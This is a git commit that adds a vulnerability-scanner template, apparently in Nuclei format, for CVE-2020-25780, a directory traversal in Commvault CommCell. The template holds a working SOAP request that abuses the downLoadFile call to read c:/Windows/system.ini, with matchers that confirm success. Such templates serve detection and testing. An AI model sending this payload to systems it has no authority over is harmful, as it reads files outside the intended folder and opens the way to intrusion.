Added Commvault CommCell Directory Traversal (CVE-2020-25780) (#3182)

2021-11-29 20:02:59 +05:30 · 2021-11-29 20:02:59 +05:30 · 38839cfbbc
parent 7ef4f90cf0
commit 38839cfbbc
1 changed files with 41 additions and 0 deletions
--- a/cves/2020/CVE-2020-25780.yaml
+++ b/cves/2020/CVE-2020-25780.yaml
@ -0,0 +1,41 @@
+id: CVE-2020-25780
+
+info:
+  name: Commvault CommCell Directory Traversal
+  author: pdteam
+  severity: high
+  tags: cve,cve2020,commvault,lfi
+  description: In CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13, Directory Traversal can occur such that an attempt to view a log file can instead view a file outside of the log-files folder.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-25780
+    - https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html
+
+requests:
+  - method: POST
+    path:
+      - "http://{{Host}}:81/SearchSvc/CVSearchService.svc"
+
+    headers:
+      Cookie: Login
+      soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile
+      content-type: text/xml
+
+    body: |
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
+           <soapenv:Header/>
+           <soapenv:Body>
+              <tem:downLoadFile>
+                 <tem:path>c:/Windows/system.ini</tem:path>
+              </tem:downLoadFile>
+           </soapenv:Body>
+        </soapenv:Envelope>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "downLoadFileResult"
+
+      - type: status
+        status:
+          - 200